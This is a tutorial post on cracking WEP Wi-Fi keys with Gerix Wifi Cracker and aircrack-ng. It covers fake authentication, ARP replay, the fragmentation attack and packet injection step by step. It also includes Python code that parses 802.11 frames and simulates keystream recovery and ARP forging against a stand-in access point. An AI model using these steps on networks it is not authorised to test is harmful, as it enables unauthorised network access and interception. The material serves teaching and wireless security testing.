I will not waste your time with the individual aircrack-ng suite commands, or with idle chatter, when there are good GUI programs nowadays that wrap ALL of those commands. One of these programs is Gerix Wifi Cracker, which is included in BackTrack 5's utility arsenal.
Before we begin we have to note one huge thing: does our wireless adapter support packet injection? The answer to this question is handled pretty well here. What injection gives us is the ability to use some EXTRA active attacks from the aircrack-ng suite to speed up the process of WEP cracking. So don't worry too much if your card can't handle injection; take a look at the end of the post to see how to do it without any injection.
So our first step is to run Gerix Wifi Cracker. Go to your BackTrack applications menu -> Backtrack -> Exploitation tools -> Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng. A window with the actual application should pop up. The next step is to select our interface and put it in monitor mode. This is done in the Configuration tab: select your interface (usually wlan0) and click Enable/Disable Monitor mode.
Select the newly created mon0 interface (this is the monitor-mode interface of your wireless card). Next, scroll down (if needed), set Channels to "all channels" and Seconds to 10, and click Rescan networks. Obviously, wait 10 seconds and a list of wireless networks will appear. Find YOUR network, the one you are doing this test on. In the Enc column it HAS TO SAY WEP, as that is the encryption we will be breaking today.
Once the network is selected, move to the WEP tab of the program. Click on "Start sniffing and logging" and leave the terminal open. Now here is where it becomes a little tricky. It is important to know whether the network you have selected has clients connected to it; if there are clients connected, everything goes much faster and smoother. You can see in the terminal that just popped up whether there are any clients: if there are MAC addresses under STATION, then there are clients connected. To put it simpler, if there are any MAC addresses besides the target's own, there most likely are clients associated with it.
You can see here that there is a connected client under STATION, #Data is still only 7, and ENC/CIPHER say WEP.
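To make the airodump-ng output above less magical, here is what the #Data column, the STATION list and the ENC column are built from. This is an added example, not code from the post, from Gerix or from aircrack-ng: it parses the 802.11 MAC header and the 4-byte IV/key-index field that follows it in a protected data frame, then keeps per-BSSID counters. The frames at the bottom are constructed for the illustration (the body bytes are not really encrypted), and the MAC addresses are made up.

```python
"""What airodump-ng's #Data column and STATION list are built from (added example).

Parses the 802.11 MAC header and the 4-byte IV/key-index field that follows it in a
protected data frame, then groups frames by BSSID. The sample frames at the bottom are
constructed for this illustration, not real captures; the code is not from Gerix or
aircrack-ng.
"""
import struct
from collections import defaultdict

HDR = struct.Struct("<HH6s6s6sH")  # frame control, duration, addr1, addr2, addr3, seq/frag


def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_data_frame(frame: bytes):
    """Return (bssid, station, iv, cipher) for a protected data frame, else None."""
    if len(frame) < HDR.size + 4:
        return None
    fc, _, a1, a2, a3, _ = HDR.unpack_from(frame)
    ftype, subtype, flags = (fc >> 2) & 3, (fc >> 4) & 0xF, fc >> 8
    if ftype != 2 or subtype & 4:               # not a data frame, or a null frame with no body
        return None
    to_ds, from_ds, protected = flags & 1, flags & 2, flags & 0x40
    if not protected or (to_ds and from_ds):    # cleartext, or 4-address WDS frame (skipped)
        return None
    if to_ds:                                   # station -> AP: addr1 is the BSSID
        bssid, station = a1, a2
    elif from_ds:                               # AP -> station: addr2 is the BSSID
        bssid, station = a2, a1
    else:                                       # ad-hoc: addr3 is the BSSID
        bssid, station = a3, a2
    off = HDR.size + (2 if subtype & 8 else 0)  # QoS data carries a 2-byte QoS control field
    iv_field = frame[off:off + 4]
    if len(iv_field) < 4:
        return None
    # Bit 5 of the key-index byte is ExtIV, set only by TKIP/CCMP; WEP frames leave it clear.
    cipher = "TKIP/CCMP" if iv_field[3] & 0x20 else "WEP"
    return mac(bssid), mac(station), iv_field[:3], cipher


def summarize(frames):
    """Per-BSSID counters in the spirit of airodump-ng: #Data, unique IVs, reuse, stations."""
    nets = defaultdict(lambda: {"data": 0, "ivs": set(), "reused": 0,
                                "stations": set(), "cipher": set()})
    for frame in frames:
        parsed = parse_data_frame(frame)
        if parsed is None:
            continue
        bssid, station, iv, cipher = parsed
        net = nets[bssid]
        net["data"] += 1
        if iv in net["ivs"]:                    # 24-bit IVs repeat; aircrack-ng wants unique ones
            net["reused"] += 1
        net["ivs"].add(iv)
        net["stations"].add(station)
        net["cipher"].add(cipher)
    return dict(nets)


def build_frame(bssid, station, iv, to_ds=True, qos=False, ext_iv=False, body=bytes(8)):
    """Assemble a protected data frame (constructed test input, no real encryption)."""
    fc = (2 << 2) | ((8 if qos else 0) << 4) | ((0x40 | (1 if to_ds else 2)) << 8)
    a1, a2 = (bssid, station) if to_ds else (station, bssid)
    hdr = HDR.pack(fc, 0, a1, a2, b"\xff" * 6, 0)
    return hdr + (b"\x00\x00" if qos else b"") + iv + bytes([0x20 if ext_iv else 0]) + body


# Constructed capture with made-up addresses: one WEP network, one WPA network, one beacon.
AP, AP2, STA = bytes.fromhex("001122334455"), bytes.fromhex("ccddeeff0011"), bytes.fromhex("66778899aabb")
SAMPLE = [
    build_frame(AP, STA, b"\x00\x00\x01"),                   # client -> AP, WEP
    build_frame(AP, STA, b"\x00\x00\x02", qos=True),         # same, as a QoS data frame
    build_frame(AP, STA, b"\x00\x00\x01", to_ds=False),      # AP -> client, IV reused
    build_frame(AP2, STA, b"\x00\x00\x03", ext_iv=True),     # a WPA (TKIP/CCMP) network
    HDR.pack(0x0080, 0, b"\xff" * 6, AP, AP, 0) + bytes(12),  # beacon: management, not counted
]

if __name__ == "__main__":
    for bssid, net in summarize(SAMPLE).items():
        print(bssid, "#Data", net["data"], "IVs", len(net["ivs"]), "reused", net["reused"],
              "ENC", "/".join(sorted(net["cipher"])), "STATION", sorted(net["stations"]))
```

Two things worth noticing when you read the real airodump-ng output with this in mind: #Data counts every protected data frame, so the number of distinct IVs aircrack-ng can actually use is somewhat lower once IVs start repeating, and the ExtIV bit is what separates a WEP network from a WPA one at the frame level, regardless of what the beacon advertises.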
If there ARE clients, select WEP Attacks (with clients). There, click on "Associate with AP using fake auth", wait a few seconds and click on "ARP request replay". That's pretty much it. Keep an eye on the first terminal that you left open: once the #Data column passes 10,000 you are ready to TRY to crack the key (don't close any of the windows yet). Go to the Cracking tab and click on "Aircrack-ng - Decrypt WEP password", which is under WEP Cracking. Wait and see what happens: either it shows you the WEP key of the network, or it reports that it failed and will try again with 5,000 more IVs. If it is the second, just wait for 5,000 more IVs (that is the number under #Data in the first terminal) and repeat.
If there AREN'T any clients the process takes a bit longer. Head to WEP Attacks (no-client). Here there are two choices: fragmentation and ChopChop. Fragmentation is usually quicker, but it doesn't work with all cards. To keep this post from getting too long I will only explain the fragmentation attack. Click on "Associate with AP using fake auth".
Wait a few seconds, click on "Fragmentation attack" and wait for the message "Now you can build a packet with packetforge-ng out of that 1500 bytes keystream". It might take a while, so give it a chance. If it doesn't appear within 4-5 minutes the attack has failed, and you can try a ChopChop attack instead. If it succeeds, move on to clicking "Create the ARP packet to be injected on the victim access point". Wait a second and click on "Inject the created packet on victim access point". A window will pop up that starts sending packets to the target and generates #Data. Once again, as you pass 10,000 under #Data you are free to try to crack the key from the Cracking tab. Note that you can use this method even if there are clients connected, though it is slower than the first one.
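The three no-client steps above (fake auth, fragmentation attack to get a 1500-byte keystream, packetforge-ng to build an ARP packet the AP will accept) all rest on one property of WEP: each frame body is RC4(IV || key) XOR (plaintext || CRC32), so a few bytes of known plaintext give you keystream for that IV, and the AP happily accepts that IV again. The following is an added example, not code from the post, from Gerix or from aircrack-ng: RC4, the WEP frame body and the ARP bytes are written from the public specifications, the 40-bit key and MAC/IP addresses are made up, and the AccessPoint class is a stand-in for the real access point (it knows the key, reassembles fragments with valid ICVs, and relays the result under a fresh IV). The keystream growth loop follows the same 16-fragment rounds the real fragmentation attack uses; the exact internals of aireplay-ng are not reproduced here.

```python
"""Keystream recovery, fragmentation and packet forging against WEP (added example).

RC4, the WEP frame body and the ARP bytes are written from the public specifications;
nothing here is code from Gerix or aircrack-ng, and AccessPoint stands in for a real AP.
"""
import struct
import zlib
from typing import List, Optional, Tuple

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")   # identical in every ARP frame
ARP_FIXED = bytes.fromhex("0001080006040001")      # Ethernet, IPv4, hlen 6, plen 4, request
MAX_FRAGMENTS = 16                                  # 802.11 allows 16 fragments per MSDU


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: a plain CRC32, unkeyed, so anyone can compute it."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: IV(3) | key index(1) | RC4(IV || key) XOR (plaintext || ICV)."""
    data = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(data, rc4(iv + key, len(data)))

def wep_decrypt(key: bytes, body: bytes) -> Optional[bytes]:
    """Return the plaintext, or None when the ICV fails (the AP drops such frames)."""
    iv, enc = body[:3], body[4:]
    data = xor(enc, rc4(iv + key, len(enc)))
    plaintext = data[:-4]
    return plaintext if icv(plaintext) == data[-4:] else None

def recover_keystream(body: bytes, known: bytes) -> Tuple[bytes, bytes]:
    """Known-plaintext step: keystream = ciphertext XOR known plaintext, valid for this IV."""
    return body[:3], xor(body[4:4 + len(known)], known)

def forge(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """What packetforge-ng does: encrypt chosen plaintext with a recovered IV/keystream pair."""
    data = plaintext + icv(plaintext)
    if len(keystream) < len(data):
        raise ValueError("keystream too short for this packet")
    return iv + b"\x00" + xor(data, keystream)

class AccessPoint:
    """Stand-in for the victim AP: knows the key, reassembles fragments, relays under a new IV."""
    def __init__(self, key: bytes):
        self.key, self.iv_counter = key, 0
    def next_iv(self) -> bytes:
        self.iv_counter += 1
        return self.iv_counter.to_bytes(3, "big")
    def relay_fragments(self, fragments: List[bytes]) -> Optional[bytes]:
        parts = [wep_decrypt(self.key, f) for f in fragments]
        if any(p is None for p in parts):           # one bad ICV and the whole MSDU is dropped
            return None
        return wep_encrypt(self.key, self.next_iv(), b"".join(parts))

def fragmentation_attack(ap: AccessPoint, iv: bytes, keystream: bytes,
                         target: int = 1500) -> Tuple[bytes, bytes]:
    """Grow a short keystream until it covers `target` bytes plus ICV, one relay per round."""
    while len(keystream) < target + 4:
        chunk = len(keystream) - 4                  # payload per fragment, plus its 4-byte ICV
        want = min(chunk * MAX_FRAGMENTS, target)
        payload = (LLC_SNAP_ARP + ARP_FIXED + bytes(want))[:want]   # chosen, hence known
        frags = [forge(iv, keystream, payload[i:i + chunk]) for i in range(0, want, chunk)]
        relayed = ap.relay_fragments(frags)
        if relayed is None:
            raise RuntimeError("AP dropped the fragments: keystream or IV is wrong")
        iv, keystream = recover_keystream(relayed, payload + icv(payload))
    return iv, keystream

def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    return LLC_SNAP_ARP + ARP_FIXED + sender_mac + sender_ip + bytes(6) + target_ip

def demo(key: bytes = bytes.fromhex("0123456789")) -> bool:
    """Capture one client ARP, get 8 keystream bytes, grow to 1500, forge an ARP the AP accepts."""
    ap = AccessPoint(key)                           # key and addresses are made up for the demo
    client = arp_request(bytes.fromhex("66778899aabb"), bytes([192, 168, 1, 2]), bytes([192, 168, 1, 1]))
    captured = wep_encrypt(key, ap.next_iv(), client)       # the "sniffed" frame
    iv, ks = recover_keystream(captured, LLC_SNAP_ARP)      # 8 bytes, no key needed
    iv, ks = fragmentation_attack(ap, iv, ks)
    forged_arp = arp_request(bytes.fromhex("0011223344ff"), bytes([192, 168, 1, 3]), bytes([192, 168, 1, 1]))
    return wep_decrypt(key, forge(iv, ks, forged_arp)) == forged_arp
```

Run `demo()` and it returns True without the attacker ever touching the key: 8 known LLC/SNAP bytes become 8 keystream bytes, three relay rounds (64, 1024 and 1500 bytes of chosen plaintext) grow that to the 1500-byte keystream Gerix reports, and the forged ARP request passes the AP's ICV check. That forged packet is exactly what the "Inject the created packet" step replays in a loop; every reply the AP sends carries a fresh IV, which is what drives #Data up for aircrack-ng.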
The last and slowest method is doing this with a wireless card that does not support injection. What you need to do here is simply use "Start sniffing and logging" under the WEP tab and sit and watch. Once again, #Data must pass 10,000 before you attempt to crack. The problem is that this might take anywhere from 5 minutes to 5 days, so to speak, as all the traffic has to be generated by the actual users of the network; if there are no clients you may never crack it.
The next post will be about WPA/WPA2 cracking with pyrit and rainbow tables.